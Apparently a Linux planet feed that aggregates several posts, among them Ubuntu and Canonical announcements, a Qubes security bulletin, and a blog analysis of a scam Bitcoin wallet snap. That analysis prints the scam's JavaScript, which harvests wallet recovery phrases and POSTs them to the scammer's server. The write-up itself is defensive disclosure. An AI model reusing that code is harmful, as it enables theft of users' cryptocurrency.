Topics revealed | Join the Wuhan Linux User Group for an in-person meetup on 23 March!
19 March, 2024 08:53AM by aida
On Mastodon, the question came up of how Ubuntu would deal with something like the npm install everything situation. I replied:
Ubuntu is curated, so it probably wouldn’t get this far. If it did, then the worst case is that it would get in the way of CI allowing other packages to be removed (again from a curated system, so people are used to removal not being self-service); but the release team would have no hesitation in removing a package like this to fix that, and it certainly wouldn’t cause this amount of angst.
If you did this in a PPA, then I can’t think of any particular negative effects.
OK, if you added lots of build-dependencies (as well as run-time dependencies) then you might be able to take out a builder. But Launchpad builders already run arbitrary user-submitted code by design and are therefore very carefully sandboxed and treated as ephemeral, so this is hardly novel.
There’s a lot to be said for the arrangement of having a curated system for the stuff people actually care about plus an ecosystem of add-on repositories. PPAs cover a wide range of levels of developer activity, from throwaway experiments to quasi-official distribution methods; there are certainly problems that arise from it being difficult to tell the difference between those extremes and from there being no systematic confinement, but for this particular kind of problem they’re very nearly ideal. (Canonical has tried various other approaches to software distribution, and while they address some of the problems, they aren’t obviously better at helping people make reliable social judgements about code they don’t know.)
For a hypothetical package with a huge number of dependencies, to even try to upload it directly to Ubuntu you’d need to be an Ubuntu developer with upload rights (or to go via Debian, where you’d have to clear a similar hurdle). If you have those, then the first upload has to pass manual review by an archive administrator. If your package passes that, then it still has to build and get through proposed-migration CI before it reaches anything that humans typically care about.
On the other hand, if you were inclined to try this sort of experiment, you’d almost certainly try it in a PPA, and that would trouble nobody but yourself.
Whether it’s via a popular vote, divine providence or magical women lying in ponds distributing swords, it has often been individuals of great renown or noble birth who have ascended to the throne. On the eve of our 20th anniversary this year, we are thrilled to present Noble Numbat, the mascot for Ubuntu 24.04 LTS.
The numbat, a small, enigmatic marsupial from Australia, may not be the first creature that comes to mind when one ponders nobility. However, looks can be deceiving. This incredible and endangered species is a pocket-sized marsupial anteater that lives almost entirely on termites, which it catches with a tongue a third the length of its body. With a back of black and white stripes, much like a kingly robe, it was chosen as the animal emblem of Western Australia. The numbat is a testament that those from humble beginnings can make their mark on the world.
Ubuntu, in the same regard, has grown from a fledgling dream of a more human-friendly Linux into a trusted platform that powers millions of devices around the world. For this LTS (long term support) release we wanted to capture that essence of grandeur and the stateliness of our small Myrmecobiidae friend.
We are very excited to unveil and crown the official mascot wallpaper. Give your computer or phone a majestic upgrade by downloading these Noble Numbat Wallpapers in a variety of formats and sizes.
This majestic wallpaper will be joined by a collection of others from the current incarnation of the Ubuntu Wallpaper Competition. This year’s competition has attracted other Numbat contestants, exciting scenery from the land of the Numbat, and abstract art in honor of their majesty. We cordially invite you to behold the distinguished recipients of this year’s accolades:
In the grand tapestry of our Ubuntu realm, the Ubuntu Wallpaper Competition stands as one avenue for you, esteemed allies and artisans, to contribute to our vibrant community. I invite you to explore the many ways to join our collective endeavor. Venture to https://ubuntu.com/community/contribute and enrich Ubuntu with your creativity and collaboration.
Canonical’s Charmed Kubernetes is now supported on NVIDIA AI Enterprise 5.0. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the NVIDIA AI Enterprise software platform, which provides developers with the latest AI models and optimised runtimes.
NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments. New updates include:
Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu now have a single platform to rapidly develop AI applications on the latest generation of NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who want to deploy their latest AI workloads using Kubernetes, it is vital to extract the most performance from Tensor Core GPUs through NVIDIA drivers and integrations.
Charmed Kubernetes from Canonical provides several features unique to this distribution, including NVIDIA operators, GPU optimisation features, and composability and extensibility through customised integrations with the Ubuntu operating system.
Charmed Kubernetes can automatically detect GPU-enabled hardware and install required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the NVIDIA GPU Operator charm is available for specific GPU configuration and tuning. With support for GPU operators in Charmed K8s, organisations can rapidly and repeatedly deploy the same models utilising existing on-prem or cloud infrastructure to power AI workloads.
With the NVIDIA GPU Operator, GPUs on the system are detected automatically and the required NVIDIA software is installed from NVIDIA repositories. It also enables optimal configurations through features such as NVIDIA Multi-Instance GPU (MIG) technology, in order to extract the most efficiency from Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing capacity for larger-scale applications and more complex model deployments.
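To illustrate how a workload consumes a GPU once the GPU Operator has installed the drivers and device plugin, a pod can request GPU resources through the standard nvidia.com/gpu resource name. This is a minimal sketch; the pod name, container image, and resource count are illustrative:

```yaml
# Minimal sketch of a pod requesting a single GPU on a cluster where
# the NVIDIA GPU Operator has set up drivers and the device plugin.
# Image and resource counts are illustrative, not prescriptive.
apiVersion: v1
kind: Pod
metadata:
  name: cuda-smoke-test
spec:
  restartPolicy: Never
  containers:
    - name: cuda
      image: nvcr.io/nvidia/cuda:12.3.1-base-ubuntu22.04
      command: ["nvidia-smi"]        # print visible GPUs and driver version
      resources:
        limits:
          nvidia.com/gpu: 1          # schedules the pod onto a GPU-enabled node
```

With MIG enabled, the same mechanism exposes GPU slices as distinct resource names, so partitioned instances can be requested in exactly the same way.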
Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR allows for optimised network performance, by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.
Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.”
Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.
Try out NVIDIA AI Enterprise with Charmed Kubernetes with a free, 90-day evaluation
Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.
NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud. It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level.
As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities.
This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.
Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:
As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.
With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Support releases, delivering security updates and patching for 5 years. With Ubuntu Pro, organisations can extend that support and security maintenance commitment to 10 years, offloading security and compliance work so teams can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are.
Getting started is easy (and free).
Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.
The snap was eventually removed, and some threads were started over on the Snapcraft forum.
Nothing has changed, it seems, because once again ANOTHER TEN scam Bitcoin wallet apps have been published in the Snap Store today.
Yes, Brenda!
This one has the snappy (sorry) name of exodus-build-96567, published by the not-very-legit-looking publisher digisafe00000. Uh-huh.
Edit: I initially wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out that there’s a whole bunch under this account, all with popular crypto wallet brand names.
There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.
Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum-effort store listing page here. But I’m sure it could fool someone; they usually do.
It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.
Note: Do not install this.
“Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.
Although it is “Safe”, apparently, according to the store listing.
It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!
$ snap info exodus-build-96567
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
latest/stable: 8.6.5 2024-03-18 (1) 565kB -
latest/candidate: ↑
latest/beta: ↑
latest/edge: ↑
Here’s the app running in a VM.
If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.
As with all these scam applications, all it does is ask for a Bitcoin recovery phrase, and with that it will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.
When given a fake passphrase/recovery key, it calls some remote API and then shows a dubious error, having already taken your recovery key and sent it to the scammer.
While the snap is still available for download from the store, I grabbed it.
$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
snap ack exodus-build-96567_1.assert
snap install exodus-build-96567_1.snap
I then unpacked the snap to take a peek inside.
unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write
[===========================================================|] 32/32 100%
created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks
There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.
tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
├── command-chain
│ ├── desktop-launch
│ ├── hooks-configure-fonts
│ └── run
├── gui
│ ├── exodus-build-96567.desktop
│ └── exodus-build-96567.png
└── snapcraft.yaml
8 directories, 11 files
Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.
name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots
apps:
exodus-build-96567:
command: bin/exodus-bin
extensions: [gnome]
plugs:
- network
- unity7
- network-status
layout:
/usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0
parts:
exodus-build-96567:
plugin: dump
source: .
organize:
exodus-bin: bin/
For completeness, here’s the snap.yaml that gets generated at build time.
name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
Forget managing a million different wallets and seed phrases.
Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
exodus-build-96567:
command: bin/exodus-bin
plugs:
- desktop
- desktop-legacy
- gsettings
- opengl
- wayland
- x11
- network
- unity7
- network-status
command-chain:
- snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
GTK_USE_PORTAL: '1'
LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
desktop:
mount-host-font-cache: false
gtk-3-themes:
interface: content
target: $SNAP/data-dir/themes
default-provider: gtk-common-themes
icon-themes:
interface: content
target: $SNAP/data-dir/icons
default-provider: gtk-common-themes
sound-themes:
interface: content
target: $SNAP/data-dir/sounds
default-provider: gtk-common-themes
gnome-42-2204:
interface: content
target: $SNAP/gnome-platform
default-provider: gnome-42-2204
hooks:
configure:
command-chain:
- snap/command-chain/hooks-configure-fonts
plugs:
- desktop
layout:
/usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
/usr/share/xml/iso-codes:
bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
/usr/share/libdrm:
bind: $SNAP/gnome-platform/usr/share/libdrm
Unlike the previous scammy application, which was written using Flutter, this one appears to be a web page in a WebKitGTK wrapper.
If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.
I brought the network up, ran Wireshark, then launched the rogue application again. The app clearly loads the remote content (HTML, JavaScript, CSS, and logos) then renders it inside the wrapper window.
The JavaScript is pretty simple. It has a dictionary of words that are allowed in a recovery key. Here’s a snippet.
var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
⋮
'youth', 'zebra', 'zero', 'zone', 'zoo'];
As the user types words, the application checks the list.
var alreadyAdded = {};
function checkWords() {
var button = document.getElementById("continueButton");
var inputString = document.getElementById("areatext").value;
var words_list = inputString.split(" ");
var foundWords = 0;
words_list.forEach(function(word) {
if (words.includes(word)) {
foundWords++;
}
});
if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {
button.style.backgroundColor = "#511ade";
if (!alreadyAdded[words_list]) {
sendPostRequest(words_list);
alreadyAdded[words_list] = true;
button.addEventListener("click", function() {
renderErrorImport();
});
}
}
else{
button.style.backgroundColor = "#533e89";
}
}
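Two things are worth noting about that check. First, thanks to operator precedence, the condition parses as `(foundWords === length && length === 12) || length === 18 || length === 24`, so any 18- or 24-word input passes regardless of whether the words are in the dictionary. Second, `sendPostRequest` fires as soon as the condition is met, not when the button is clicked. Here is a reconstruction in Python (mine, not code from the snap) contrasting the scam’s actual condition with what a correctly parenthesised check would look like:

```python
# Reconstruction (not from the snap) contrasting the scam's word check
# with a correctly parenthesised version. WORDS is a tiny stand-in for
# the app's full dictionary.
WORDS = {"abandon", "ability", "able", "about", "zebra", "zero", "zone", "zoo"}


def scam_condition(phrase: str) -> bool:
    # Faithful translation of the JS condition: because && binds tighter
    # than ||, this is (all-known and len==12) or len==18 or len==24.
    words = phrase.split(" ")
    found = sum(1 for w in words if w in WORDS)
    return (found == len(words) and len(words) == 12) \
        or len(words) == 18 or len(words) == 24


def correct_condition(phrase: str) -> bool:
    # What was presumably intended: dictionary check applies to
    # 12-, 18- and 24-word phrases alike.
    words = phrase.split(" ")
    return all(w in WORDS for w in words) and len(words) in (12, 18, 24)
```

Eighteen words of gibberish satisfy `scam_condition` but not `correct_condition`; either way, the phrase is already on its way to the scammer’s server by the time any button is clicked.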
If the entered words pass the check, the “Continue” button lights up and the phrase is immediately sent in a “POST” request to a /collect endpoint on the server, before the button is even clicked.
function sendPostRequest(words) {
var data = {
name: 'exodus',
data: words
};
fetch('/collect', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Error during the request');
}
return response.json();
})
.then(data => {
console.log('Response:', data);
})
.catch(error => {
console.error('There is an error:', error);
});
}
Here you can see the payload containing the words I typed, selected from the dictionary mentioned above.
It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {"name":"exodus"}. Presumably this is for network connectivity checking, telemetry, or seeing which of the scam wallet applications are in use.
function sendPing() {
var data = {
name: 'exodus',
};
fetch('/ping', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
})
.then(response => {
if (!response.ok) {
throw new Error('Error during the request');
}
return response.json();
})
.then(data => {
console.log('Response:', data);
})
.catch(error => {
console.error('There is an error:', error);
});
}
All of this is done over HTTP, because of course it is. No security needed here!
It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.
I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.
It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.
I’ve reported the app to the Snap Store team.
Until next time, Brenda!
As Canonical approaches its 20th anniversary, we have proven our proficiency in managing a resilient software supply chain. But in the pursuit of excellence, we are always looking to set new standards in software development and embrace cutting-edge quality management practices. This enables us to meet current technological landscape needs. It also paves the way for future innovation, motivating us (as ever) to make open source a key driving force across all industries. In this article I will explore how combining the openness and transparency inherent in open source principles with the right quality management frameworks enables us to lay new foundations for the software-defined industries of tomorrow.
The presence of open source software components in regulated industries has accelerated dramatically in the past couple of years; they can be found everywhere, from the smallest industrial component to the largest ship in the world. Such a broad application domain brings additional complexity and heightened expectations around evolving quality requirements. While language-specific coding standards were a way to address guidelines in a relatively simple world, they are no longer enough. Instead, we need to adopt quality models that are not just a compliance requirement, but an effective way to evaluate the engineering components we produce.
While these types of models are often developed in the context of regulated domains in specific industries, they can provide insights that are impactful across a broad range of applications. For instance, ISO 25010, a quality model that serves as the cornerstone of a product quality evaluation system, is a great framework to help engineers understand the strengths and weaknesses of specific artefacts using static code analysis. By using an objective, reproducible and independent quality model that follows the ISO 25010 standard, Canonical can meet the expectations of a broad spectrum of industries and unlock the opportunities that open source software brings.
TIOBE is supporting Canonical in getting an independent overview of its code quality by checking the reliability, security, and maintainability of its software sources. The measurements are based on ISO 25010 and follow a strict procedure defined by TIOBE’s Quality Indicator (TQI). TIOBE provides real-time data, integrated into programming environments and separate dashboards, and makes use of best-in-class third-party code checkers for Canonical.
Paul Jansen, CEO of TIOBE states: “We are thrilled to contribute to the success of Canonical. After having checked the code quality of a lot of Canonical’s projects in our independent and regulated way, it is clear that Canonical is scoring far above the average of the 8,000+ commercial projects we measure every day”.
At Canonical, we believe that Quality Management (QM) is an essential pillar in the development of open source software. That is why we added TQI as an additional control point across our software development lifecycle. In most industries, expectations for innovation, and for quality attributes such as those highlighted by the TIOBE Quality Indicator, are very high. The integration of open source software with industry-recognised quality models marks a paramount step towards achieving excellence and producing superior software solutions.
A prime example of the advantages of independent quality indicators can be seen in the automotive industry. This sector, with its high demands for safety and technological innovation, presents unique challenges that require impeccable quality and robust software solutions. As vehicles become increasingly software-defined, integrating open source software with industry-recognised quality models becomes not just beneficial but essential. Quality management works as a driving force – not just ensuring the reliability and safety of vehicles – but also the key building block for generating trust in open source within the automotive industry.
As Canonical’s Automotive Sector Lead, Bertrand Boisseau, explains: “The results of the collaboration with TIOBE are crucial, especially in the realm of Software Defined Vehicles (SDVs), where the abstraction and decoupling of software and hardware development cycles is key. The TIOBE TiCS framework supports our R&D efforts related to automotive, enabling us to go beyond the expectations of this demanding ecosystem”.
Our approach is designed to address the inherent complexity of modern software stacks, which are by nature heterogeneous. We make use of quality models like ISO 25010 as accelerators to enhance our quality management processes. At Canonical, these models are instrumental in enriching our continuous improvement practices with measurable data, while also aligning with the expectations of the broader enterprise landscape, particularly when combined with the openness and transparency open source software provides.
If you have embarked on a similar journey to measure quality management in your organisation, I would love to hear about your experience. If you’re eager to join our mission in advancing precision engineering, please explore our openings starting with the Technical Manager Automotive and Industrial as well as our Lead Development Lifecycle Engineer positions. Stay tuned to follow our journey towards engineering excellence and connect with me on LinkedIn.
18 March, 2024 06:52AM by aida
We have updated Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982). The text of this updated QSB (including a changelog) and its accompanying cryptographic signature are reproduced below, followed by a general explanation of this announcement and authentication instructions.
---===[ Qubes Security Bulletin 101 ]===---
2024-03-12
Register File Data Sampling (XSA-452) and
Intel Processor Return Predictions Advisory (INTEL-SA-00982)
Changelog
----------
2024-03-12: Original QSB
2024-03-17: Add information about INTEL-SA-00982
User action
------------
Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.
Summary
--------
On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:
| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.
For more information, see Intel's security advisory. [4]
In addition, Intel published INTEL-SA-00982/CVE-2023-38575 [6] on the
same day:
| Non-transparent sharing of return predictor targets between contexts
| in some Intel® Processors may allow an authorized user to potentially
| enable information disclosure via local access.
Information about this vulnerability is very sparse.
Impact
-------
On systems affected by Register File Data Sampling (RFDS), an attacker
might be able to infer the contents of data previously held in floating
point, vector, and/or integer register files on the same core, including
data from a more privileged context.
On systems affected by INTEL-SA-00982, an attacker might be able to leak
information from other security contexts, but the precise impact is
unclear.
Affected systems
-----------------
At present, Register File Data Sampling (RFDS) is known to affect only
certain Atom cores from Intel. Other Intel CPUs and CPUs from other
hardware vendors are not known to be affected. RFDS affects Atom cores
between the Goldmont and Gracemont microarchitectures. This includes
Alder Lake and Raptor Lake hybrid client systems that have a mix of
Gracemont and other types of cores.
At the time of this writing, Intel has not published information about
which systems INTEL-SA-00982 affects. Systems that are still receiving
microcode updates from Intel [7] and that received a microcode update as
part of the microcode release on 2024-03-12 [5] may be affected, even if
they are not affected by RFDS.
Patching
---------
The following packages contain security updates that address the
vulnerabilities described in this bulletin:
For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1
For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1
These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]
Dom0 must be restarted afterward in order for the updates to take
effect.
If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.
Credits
--------
See the original Xen Security Advisory.
References
-----------
[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20240312
[6] https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00982.html
[7] https://www.intel.com/content/www/us/en/support/articles/000022396/processors.html
--
The Qubes Security Team
https://www.qubes-os.org/security/
At the time of this writing, Marek is traveling and is therefore not available to sign this QSB update. He will sign it when he returns. In the meantime, you can still authenticate his original signature on the original version of this QSB. For more information, see the original QSB-101 announcement.
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmX3fZEACgkQSsGN4REu
FJAHCg/5AYLGAcnMRzZ1JgSJXQLLuQqIXfpNfZWHT4e9u6gkDYcrI4Z4AEzab5Lv
YqSeNbtMys1WCxCUXyPUNG+ZNrD9xcCfmaZuC+MNINwRoAcg+V5+B8cCMU9NUB+V
IquFrepWJcimsBeAvCPkCV4nk1BABqEu0vsViifwFvS0MWr7VFUkQom5/XkXwmZY
uUTrNWSKoJzmzwq3x0yWVNhLmjD2nMg2BKeJUiwpy1wE9Q0w9dLrHEwwewuHP7t1
JAiOFLvEAw55D9Cw8YbOWskIfHWeyhA4a8nrbPVMRTBJAryUgRtDQx6GCcn5uLiM
+/vnYu26UigX9eQy2T/O5fs3ti4BF+/D7XO9QnKXVsmAtSTfvP7/nzY8nWL9SzpB
7cBX5AH9QTHa2Rji/EpqSsZawXXs5pMTWbzObkBORObNgkHUMPOhaM+8qZaEhm5h
DMZrsCHbOsi38pmrXhuIhzY/j5Sk+wp3Wgvkqq4CXO8n7H+jjPNTrMEfcgYI/C8U
U17OvqA/iC/C/z1BRQnhiAp98/fYN6jgNWAGVMBM+XgbrCHExnP/OCH6X5pgTYwY
JbwMyFxv9XuQMDFc9zF4AVPHdAAGssU9qZDZlJg/72Az7J4kxHNlT3m9u02ljmgC
POHJyjO071i6xlCMMEuYyrgT/1qs5NjocpWaXfYSl45a3DWeHMo=
=ZGQ8
-----END PGP SIGNATURE-----
The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.
A Qubes security bulletin (QSB) is a security announcement issued by the Qubes security team. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see Qubes security bulletins (QSBs).
QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by updating normally. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.
A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git and gpg installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg> indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
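One convenient way to use such a record is a small script that compares the recorded fingerprint against the one gpg displays. A minimal sketch (not part of the official Qubes instructions; the normalize_fpr helper and the sample values are illustrative):

```shell
# Normalize a fingerprint as printed by gpg (grouped in blocks of four,
# possibly lower case) so two copies can be compared byte-for-byte.
normalize_fpr() {
  printf '%s' "$1" | tr -d ' ' | tr 'a-f' 'A-F'
}

recorded="427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494"
shown="427f11fd0faa4b080123f01cddfa1a3e36879494"

if [ "$(normalize_fpr "$recorded")" = "$(normalize_fpr "$shown")" ]; then
  echo "fingerprints match"
else
  echo "MISMATCH: do not trust this key" >&2
fi
```

Normalizing first avoids false mismatches caused purely by spacing or letter case.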
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
